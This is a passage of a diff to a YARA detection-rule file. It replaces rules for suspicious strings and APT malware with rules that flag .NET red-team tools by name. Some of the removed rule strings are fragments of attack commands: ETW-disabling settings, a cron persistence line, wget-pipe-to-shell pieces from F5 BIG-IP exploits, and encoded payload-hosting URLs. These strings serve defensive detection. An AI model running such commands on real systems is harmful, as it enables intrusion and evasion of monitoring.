+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x4 = "DropperBackdoor" fullword wide ascii
+		$name = "GhostLoader" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_SUSP_SFX_Cmd : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Dotnetinject : FILE
 {
 	meta:
-		description = "Detects suspicious SFX as used by Gamaredon group"
-		author = "Florian Roth (Nextron Systems)"
-		id = "87e75fe6-c2d7-5cb4-9432-7c37dbfe94b8"
-		date = "2018-09-27"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L324-L336"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "468f89c4-5b94-53be-b9e6-ad21de7d98ba"
+		date = "2021-01-22"
+		modified = "2022-06-28"
+		reference = "https://github.com/dtrizna/DotNetInject"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L182-L202"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "592de6a2165396c4ae8f494e26e56d0a759903b51167b1531b791897dce66868"
-		score = 65
-		quality = 60
+		logic_hash = "07ba4ba23372dbc2618dcea89ef643cd68371ace1116bfeb939b0f9adfc425bb"
+		score = 75
+		quality = 85
 		tags = "FILE"
-		hash1 = "965129e5d0c439df97624347534bc24168935e7a71b9ff950c86faae3baec403"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = /RunProgram=\"hidcon:[a-zA-Z0-9]{1,16}.cmd/ fullword ascii
+		$name = "DotNetInject" ascii wide
+		$compile = "AssemblyTitle" ascii wide
+		$fp1 = "GetDotNetInjector" ascii
+		$fp2 = "JetBrains.TeamCity.Injector." wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and filesize < 20MB and $name and $compile and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_SUSP_XMRIG_Reference : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Atpminidump : FILE
 {
 	meta:
-		description = "Detects an executable with a suspicious XMRIG crypto miner reference"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0a7324ce-90dc-5e6a-b22a-c29eccf324e9"
-		date = "2019-06-20"
-		modified = "2025-03-21"
-		reference = "https://twitter.com/itaitevet/status/1141677424045953024"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L338-L350"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "97981569-fe94-5600-8319-946edb4265e7"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/b4rtik/ATPMiniDump"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L204-L217"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c1e6f5fc390a8ada0688885bba7ed90372915deba5a5e7e5b0cd17ec450ce240"
-		score = 70
+		logic_hash = "7498ed5d11b9c3646ebd2d1330a239c43e9c5b270b1778871c2821a2fefb5137"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "\\xmrig\\" ascii
+		$name = "ATPMiniDump" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_SUSP_Just_EICAR : FILE
+rule SIGNATURE_BASE_SUSP_NET_NAME_Confuserex : FILE
 {
 	meta:
-		description = "Just an EICAR test file - this is boring but users asked for it"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5eedd77-36e2-56a0-be0c-2553043c225a"
-		date = "2019-03-24"
-		modified = "2025-03-21"
-		reference = "http://2016.eicar.org/85-0-Download.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L352-L365"
+		description = "Detects ConfuserEx packed file"
+		author = "Arnim Rupp"
+		id = "f1bda14e-c9fe-5341-8962-691a66233eb0"
+		date = "2021-01-22"
+		modified = "2021-01-25"
+		reference = "https://github.com/yck1509/ConfuserEx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L219-L234"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a48fc3542fb07131fe0a2e25277009d21b9ca7c9e112873249e5b9c31511af79"
+		logic_hash = "beecb7b66830a033e2048da246d320c1ffc5015b280b34fb61aee87c8a42fff3"
 		score = 40
 		quality = 85
 		tags = "FILE"
-		hash1 = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" fullword ascii
+		$name = "ConfuserEx" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x3558 and filesize < 70 and $s1 at 0
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_SUSP_PDB_Path_Keywords : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Sharpbuster : FILE
 {
 	meta:
-		description = "Detects suspicious PDB paths"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cbd9b331-58bb-5b29-88a2-5c19f12893a9"
-		date = "2019-10-04"
-		modified = "2025-03-21"
-		reference = "https://twitter.com/stvemillertime/status/1179832666285326337?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L367-L393"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "d30c8ee5-88b9-53b5-b209-51f6f3b988cf"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/passthehashbrowns/SharpBuster"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L236-L249"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "274b4b40190b8f7e3d123fad63e2bb6b2114a3dbef062791d442109cac149b08"
-		score = 65
+		logic_hash = "cdc19e03f75f34e6349937c0bff313298fc9310f361eec7af022c450d083ad96"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "Debug\\Shellcode" ascii
-		$ = "Release\\Shellcode" ascii
-		$ = "Debug\\ShellCode" ascii
-		$ = "Release\\ShellCode" ascii
-		$ = "Debug\\shellcode" ascii
-		$ = "Release\\shellcode" ascii
-		$ = "shellcode.pdb" nocase ascii
-		$ = "\\ShellcodeLauncher" ascii
-		$ = "\\ShellCodeLauncher" ascii
-		$ = "Fucker.pdb" ascii
-		$ = "\\AVFucker\\" ascii
-		$ = "ratTest.pdb" ascii
-		$ = "Debug\\CVE_" ascii
-		$ = "Release\\CVE_" ascii
-		$ = "Debug\\cve_" ascii
-		$ = "Release\\cve_" ascii
+		$name = "SharpBuster" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_SUSP_Disable_ETW_Jun20_1
+rule SIGNATURE_BASE_HKTL_NET_NAME_Amsibypass : FILE
 {
 	meta:
-		description = "Detects method to disable ETW in ENV vars before executing a program"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ea5dee09-959e-5ef2-8f84-5497bdef0a05"
-		date = "2020-06-06"
-		modified = "2025-03-21"
-		reference = "https://gist.github.com/Cyb3rWard0g/a4a115fd3ab518a0e593525a379adee3"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L395-L413"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "26db14d8-1034-5bd1-a719-4756c832901d"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/0xB455/AmsiBypass"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L251-L269"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "182ad2512bcfbcd92d13380113b32982eb367e458019f07038a12f494dfbebb6"
-		score = 65
+		hash = "8fa4ba512b34a898c4564a8eac254b6a786d195b"
+		logic_hash = "f93b1014c7e26462fbbd3cd572cfa21a09c5da915a9a51d3e58a46a2b9b7cfe4"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "set COMPlus_ETWEnabled=0" ascii wide fullword
-		$x2 = "$env:COMPlus_ETWEnabled=0" ascii wide fullword
-		$s1 = "Software\\Microsoft.NETFramework" ascii wide
-		$sa1 = "/v ETWEnabled" ascii wide fullword
-		$sa2 = " /d 0" ascii wide
-		$sb4 = "-Name ETWEnabled"
-		$sb5 = " -Value 0 "
+		$s_name = "AmsiBypass" ascii wide
+		$s_compile = "AssemblyTitle" ascii wide
+		$fp1 = "Adaptive Threat Protection" wide
 
 	condition:
-		1 of ( $x* ) or 3 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_SUSP_PE_Discord_Attachment_Oct21_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Recon_AD : FILE
 {
 	meta:
-		description = "Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7c217350-4a35-505d-950d-1bc989c14bc2"
-		date = "2021-10-12"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L415-L429"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "097de5cd-0cd4-59cc-a7b7-54cad8e6d230"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/outflanknl/Recon-AD"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L271-L284"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4d84ec50738f4c7aca8e77c3aabdcd77f3071733a2245a58283f070f2b220599"
-		score = 70
+		logic_hash = "7bfafb2d3e85bb584bd02cb92457d22b07626f71d071c44a4aefbb5748045446"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "https://cdn.discordapp.com/attachments/" ascii wide
+		$name = "Recon-AD" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_SUSP_Encoded_Discord_Attachment_Oct21_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Sharpwatchdogs : FILE
 {
 	meta:
-		description = "Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "06c086f4-8b79-5506-9e3f-b5d099106157"
-		date = "2021-10-12"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_strings.yar#L431-L456"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "5343be58-879a-5fe7-9036-ee6a22d85f22"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/RITRedteam/SharpWatchdogs"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L286-L299"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1ea5a83e91b5c5b4b8a1d507c365bc1583394c97a28b7d7a576f085854676769"
-		score = 70
+		logic_hash = "3b9410d7e502a5fd55e534d8fe79710d48cf65a0e9859bdd0fea6c8d32311df0"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$enc_b01 = "Y2RuLmRpc2NvcmRhcHAuY29tL2F0dGFjaG1lbnRz" ascii wide
-		$enc_b02 = "Nkbi5kaXNjb3JkYXBwLmNvbS9hdHRhY2htZW50c" ascii wide
-		$enc_b03 = "jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudH" ascii wide
-		$enc_b04 = "AGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABz" ascii wide
-		$enc_b05 = "BjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAc" ascii wide
-		$enc_b06 = "AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AH" ascii wide
-		$enc_h01 = "63646E2E646973636F72646170702E636F6D2F6174746163686D656E7473" ascii wide
-		$enc_h02 = "63646e2e646973636f72646170702e636f6d2f6174746163686d656e7473" ascii wide
-		$enc_r01 = "stnemhcatta/moc.ppadrocsid.ndc" ascii wide
+		$name = "SharpWatchdogs" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 5000KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_MAL_Qakbotloader_Export_Section_Feb23 : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Sharpcat : FILE
 {
 	meta:
-		description = "QakBot Export Selection"
-		author = "kevoreilly"
-		id = "cb86e9fb-a8d2-5285-aeda-622704399f8e"
-		date = "2023-02-17"
-		modified = "2023-12-05"
-		reference = "https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_qbot_feb23.yar#L22-L38"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "a46be8d3-bf7b-5d86-b88b-33e6c8c152d8"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/Cn33liz/SharpCat"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L301-L314"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6f99171c95a8ed5d056eeb9234dbbee123a6f95f481ad0e0a966abd2844f0e1a"
-		logic_hash = "0e40cd6acdbfb17670b414bd6f2ecdf1ae26ddd6a5d85931973b98963a43aba8"
+		logic_hash = "b9e5946f8df1649e71abf014aa6579edbbc93a12ddcc56f8d85d97ae087c8711"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		cape_options = "export=$export"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$export = {55 8B EC 83 EC 50 (3A|66 3B) ?? 74}
-		$wind = {(66 3B|3A) ?? 74 [1-14] BB 69 04 00 00 53 E8 [5-7] 74}
+		$name = "SharpCat" ascii wide fullword
+		$compile = "AssemblyTitle" ascii wide fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_MAL_Payload_F5_BIG_IP_Exploitations_Jul20_1 : CVE_2020_5902 FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_K8Tools : FILE
 {
 	meta:
-		description = "Detects code found in report on exploits against CVE-2020-5902 F5 BIG-IP vulnerability by NCC group"
-		author = "Florian Roth (Nextron Systems)"
-		id = "57705ba1-c0ad-5ca6-8539-44d9da6b5942"
-		date = "2020-06-07"
-		modified = "2023-12-05"
-		reference = "https://research.nccgroup.com/2020/07/05/rift-f5-networks-k52145254-tmui-rce-vulnerability-cve-2020-5902-intelligence/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_f5_bigip_expl_payloads.yar#L2-L23"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "b30fc856-073d-542f-b222-a957322732c2"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/k8gege/K8tools"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L316-L329"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a3651081bb09452d80cba9f673a7b61c8ee2f47a12fb64d975eb63867688ee3b"
+		logic_hash = "370cab83917bbc76f7f3a1b7793773ddf139879880e55efe59c72a07b34120f1"
 		score = 75
 		quality = 85
-		tags = "CVE-2020-5902, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "rm -f /etc/ld.so.preload" ascii fullword
-		$x2 = "echo \"* * * * * $LDR" ascii
-		$x3 = ".sh -o /tmp/in.sh" ascii
-		$x4 = "chmod a+x /etc/.modules/.tmp" ascii
-		$x5 = "chmod +x /var/log/F5-logcheck"
-		$s1 = "ulimit -n 65535" ascii fullword
-		$s2 = "-s /usr/bin/wget " ascii
-		$s3 = ".sh | sh" ascii
+		$name = "K8tools" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		filesize < 300KB and ( 1 of ( $x* ) or 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_APT_Area1_SSF_Plugx
+rule SIGNATURE_BASE_HKTL_NET_NAME_Httpsbeaconshell : FILE
 {
 	meta:
-		description = "Detects send tool used in phishing campaign reported by Area 1 in December 2018"
-		author = "Area 1"
-		id = "a5b4e781-f0d1-55df-926c-2d321aa48139"
-		date = "2018-12-19"
-		modified = "2023-12-05"
-		reference = "https://cdn.area1security.com/reports/Area-1-Security-PhishingDiplomacy.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_area1_phishing_diplomacy.yar#L2-L27"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "3bd7234b-a23e-5818-aed1-52d42023943b"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/limbenjamin/HTTPSBeaconShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L331-L344"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a71f124f0c89c4b020f21d029d0d2997b2bea71526e83bcadffb67acc9cca8f7"
+		logic_hash = "6a0d7e1f796ae6cefa297978c743916a08b2406c37fa2c1f3f697a17cb032517"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$feature_call = { 8b 0? 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
-         6a 07 6a ff ff d0 8b f0 85 f6 74 14 }
-		$keylogger_reg = { 8b 4d 08 6a 0c 6a 01 8d 55 f4 52 c7 45 f4 01 00 06 00
-         c7 45 f8 00 01 00 00 89 4d fc ff d0 85 c0 75 1d }
-		$file_op = { 55 8b ec 83 ec 20 0f b7 56 18 8b 46 10 66 8b 4e 14 89 45 e4
-         8d 44 32 10 66 89 4d f0 0f b7 4e 1a 57 89 45 e8 33 ff 8d 45 e0 8d 54
-         31 10 50 89 7d e0 89 55 ec c7 45 fa ?? ?? ?? ?? 89 7d f2 89 7d f6 ff
-         15 1c 43 02 10 }
-		$ver_cmp = { 0f b6 8d b0 fe ff ff 0f b6 95 b4 fe ff ff 66 c1 e1 08 0f b7
-         c1 0b c2 3d 02 05 00 00 7f 2c }
-		$regedit = { c7 06 23 01 12 20 c7 46 04 01 90 00 00 89 5e 0c 89 5e 08 e8
-         51 fb ff ff 8b 4d 08 8b 50 38 68 30 75 00 00 56 51 ff d2 }
-		$get_device_caps = { 8b 1d ?? ?? ?? ?? 6a 08 50 ff d3 0f b7 56 12 8b c8 0f af ca
-         b8 1f 85 eb 51 f7 e9 c1 fa 05 8b c2 c1 e8 1f 03 c2 89 45 f8 8b 45 f0 6a 0a 50 ff d3
-         0f b7 56 14 8b c8 0f af ca b8 1f 85 eb 51 }
+		$name = "HTTPSBeaconShell" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		3 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_APT_Area1_SSF_Googlesend_Strings : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Ghostpack_Compiledbinaries : FILE
 {
 	meta:
-		description = "Detects send tool used in phishing campaign reported by Area 1 in December 2018"
-		author = "Area 1 (modified by Florian Roth)"
-		id = "66a2faa1-b133-528c-91a9-06a43d2c00a0"
-		date = "2018-12-19"
-		modified = "2023-12-05"
-		reference = "https://cdn.area1security.com/reports/Area-1-Security-PhishingDiplomacy.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_area1_phishing_diplomacy.yar#L29-L46"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "7cc81894-8c01-5a17-a7ed-1cb4cf1e2d53"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/r3motecontrol/Ghostpack-CompiledBinaries"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L346-L359"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3a373ed63494b67883515c133bf5b0af3ab874397c7cb45c8399f12e35212be4"
+		logic_hash = "a8e90f07b7d1ec309e51e3606169a05c4bb2b2aa7e31ca26b21f927d648c13cd"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$conf = "RefreshToken.ini" wide
-		$client_id = "Enter your client ID here" wide
-		$client_secret = "Enter your client secret here" wide
-		$status = "We are going to send" wide
-		$s1 = { b8 00 01 00 00 f0 0f b0 23 74 94 f3 90 80 3d ?? ?? ?? ?? 00 75 ??
-         51 52 6a 00 e8 ?? ?? ?? ?? 5a 59 b8 00 01 00 00 f0 0f b0
-         23 0f ?? ?? ?? ?? ?? 51 52 6a 0a e8 ?? ?? ?? ?? 5a 59 eb c3 }
+		$name = "Ghostpack-CompiledBinaries" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Neuron_Common_Strings : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Metasploit_Sharp : FILE
 {
 	meta:
-		description = "Rule for detection of Neuron based on commonly used strings"
-		author = "NCSC UK"
-		id = "168214d4-7436-531e-9c1f-48ca22215a1b"
-		date = "2017-11-23"
-		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/turla-group-malware"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_neuron.yar#L9-L32"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "b425f241-4887-5368-b42b-3fbbd3b769c6"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/VolatileMindsLLC/metasploit-sharp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L361-L374"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d1d7a96fcadc137e80ad866c838502713db9cdfe59939342b8e3beacf9c7fe29"
-		logic_hash = "5f7a704fa0b6892b40868689c876e2f8252bb7319424212454408cbdf66f0b9f"
+		logic_hash = "7a1c4e077e197a5cdca8cb12713abb3fa86a3f6ea8e8f2f632c9c8e42d829acc"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$strServiceName = "MSExchangeService" ascii
-		$strReqParameter_1 = "cadataKey" wide
-		$strReqParameter_3 = "cadata" wide
-		$strReqParameter_4 = "cadataSig" wide
-		$strEmbeddedKey = "PFJTQUtleVZhbHVlPjxNb2R1bHVzPnZ3WXRKcnNRZjVTcCtWVG9Rb2xuaEVkMHVwWDFrVElFTUNTNEFnRkRCclNm clpKS0owN3BYYjh2b2FxdUtseXF2RzBJcHV0YXhDMVRYazRoeFNrdEpzbHljU3RFaHBUc1l4OVBEcURabVVZVklVb HlwSFN1K3ljWUJWVFdubTZmN0JTNW1pYnM0UWhMZElRbnl1ajFMQyt6TUhwZ0xmdEc2b1d5b0hyd1ZNaz08L01vZH VsdXM+PEV4cG9uZW50PkFRQUI8L0V4cG9uZW50PjwvUlNBS2V5VmFsdWU+" wide
-		$strDefaultKey = "8d963325-01b8-4671-8e82-d0904275ab06" wide
-		$strIdentifier = "MSXEWS" wide
-		$strListenEndpoint = "443/ews/exchange/" wide
-		$strB64RegKeySubstring = "U09GVFdBUkVcTWljcm9zb2Z0XENyeXB0b2dyYXBo" wide
-		$strName = "neuron_service" ascii
-		$dotnetMagic = "BSJB" ascii
+		$name = "metasploit-sharp" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and $dotnetMagic and 6 of ( $str* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Nautilus_Forensic_Artificats
+rule SIGNATURE_BASE_HKTL_NET_NAME_Trevorc2 : FILE
 {
 	meta:
-		description = "Rule for detection of Nautilus related strings"
-		author = "NCSC UK / Florian Roth"
-		id = "0c0a24da-4dbc-543a-9ec0-a5b1ec75c889"
-		date = "2017-11-23"
-		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/alerts/turla-group-malware"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_neuron.yar#L98-L125"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "d1634a0d-6964-5886-b836-85c3ce6b8a17"
+		date = "2021-01-22"
